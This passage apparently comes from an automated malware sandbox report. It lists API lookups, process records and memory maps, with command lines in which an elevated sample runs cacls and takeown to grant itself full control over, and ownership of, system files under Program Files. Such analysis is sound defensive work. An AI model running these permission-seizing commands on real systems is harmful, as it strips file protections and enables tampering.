| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x779ef190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x779ea200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x751574f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75149fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75142d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x751475a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x751425e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75156870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x751568c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75156900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75149700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75141b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779f2570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75147920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x779e9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x751562a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75156590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75156860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75149680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x751564a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7514a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x751728e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7514a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75156020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x751477b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7514fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75149a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75141ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75141da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75149930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7514a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75148770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7514fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75149fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75147910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75149a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75142dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75141d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75142b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7514a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7514a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x779cbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x751564f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74c7ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x74c7fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x74c795e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74c80680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74c7ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74c7f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74c7ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74c7ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74c7f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x74c806c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74c7efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74c7f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x74ebc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x7741ee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x773f55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x773f57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x773f9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x773f0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x7741fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74ae38f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74afb6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74afb430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74ae7740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74af74e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74afefa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74b04ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74af4580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74af1540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x74731580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x74731500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x74731560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7514a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7514f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75147580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75149910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75156030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75155f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75155ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7514a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7514a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x779c40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x779bd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x779becf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75155720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x779be140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x779beb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x779f9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x779f5540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x779e9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7514a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75170a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74e60790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7514f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7514fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75171030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7514a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x751714b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7514a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x751716f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75149970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74de3c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75148710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x751496e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-10-03 03:08:37 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #158: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #158 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:05:00, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa44 |
| Parent PID | 0xbe0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
148
0x
EC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000001f0000 | 0x001f0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x00203fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00211fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00213fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00233fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002e1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x00330000 | 0x00331fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0048ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0048ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00490000 | 0x0054dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x006effff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x006f0000 | 0x00a26fff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe | 0x00d70000 | 0x00d79fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000d80000 | 0x00d80000 | 0x04d7ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74650000 | 0x74677fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e0b0000 | 0x7e0b0000 | 0x7e1affff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e1b0000 | 0x7e1b0000 | 0x7e1d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e1d6000 | 0x7e1d6000 | 0x7e1d8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e1d9000 | 0x7e1d9000 | 0x7e1d9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e1dc000 | 0x7e1dc000 | 0x7e1defff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e1df000 | 0x7e1df000 | 0x7e1dffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #159: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #159 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:05:01, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xeec |
| Parent PID | 0xbe0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
3AC
0x
7EC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00170000 | 0x0017ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000bf0000 | 0x00bf0000 | 0x04beffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004bf0000 | 0x04bf0000 | 0x04c0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004bf0000 | 0x04bf0000 | 0x04bfffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004c00000 | 0x04c00000 | 0x04c03fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c10000 | 0x04c10000 | 0x04c11fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x04c10000 | 0x04c14fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004c20000 | 0x04c20000 | 0x04c33fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004c40000 | 0x04c40000 | 0x04c7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c80000 | 0x04c80000 | 0x04cbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004cc0000 | 0x04cc0000 | 0x04cc3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004cd0000 | 0x04cd0000 | 0x04cd0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ce0000 | 0x04ce0000 | 0x04ce1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004cf0000 | 0x04cf0000 | 0x04e4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004cf0000 | 0x04cf0000 | 0x04d2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d30000 | 0x04d30000 | 0x04d30fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d40000 | 0x04d40000 | 0x04d40fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d50000 | 0x04d50000 | 0x04e4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e50000 | 0x04e50000 | 0x04e8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ea0000 | 0x04ea0000 | 0x04eaffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04eb0000 | 0x04f6dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004f70000 | 0x04f70000 | 0x050cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x04f70000 | 0x04f99fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000050c0000 | 0x050c0000 | 0x050cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000050d0000 | 0x050d0000 | 0x05257fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005260000 | 0x05260000 | 0x053e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000053f0000 | 0x053f0000 | 0x067effff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x067f0000 | 0x06b26fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74650000 | 0x74677fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74730000 | 0x74737fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e930000 | 0x7e930000 | 0x7ea2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ea30000 | 0x7ea30000 | 0x7ea52fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ea57000 | 0x7ea57000 | 0x7ea59fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea5a000 | 0x7ea5a000 | 0x7ea5afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea5c000 | 0x7ea5c000 | 0x7ea5efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea5f000 | 0x7ea5f000 | 0x7ea5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #160: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #160 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:05:01, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Self Terminated |
| Monitor Duration | 00:00:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf14 |
| Parent PID | 0xcf0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
388
0x
A34
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000260000 | 0x00260000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x0026ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x00273fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x00281fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x00283fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x002a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000330000 | 0x00330000 | 0x00333fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000340000 | 0x00340000 | 0x00340fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x00351fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00360000 | 0x0041dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000420000 | 0x00420000 | 0x0045ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x0049ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x004cffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x004a0000 | 0x004a1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x004cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x0053ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x007affff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x007b0000 | 0x00ae6fff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe | 0x00d70000 | 0x00d79fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000d80000 | 0x00d80000 | 0x04d7ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
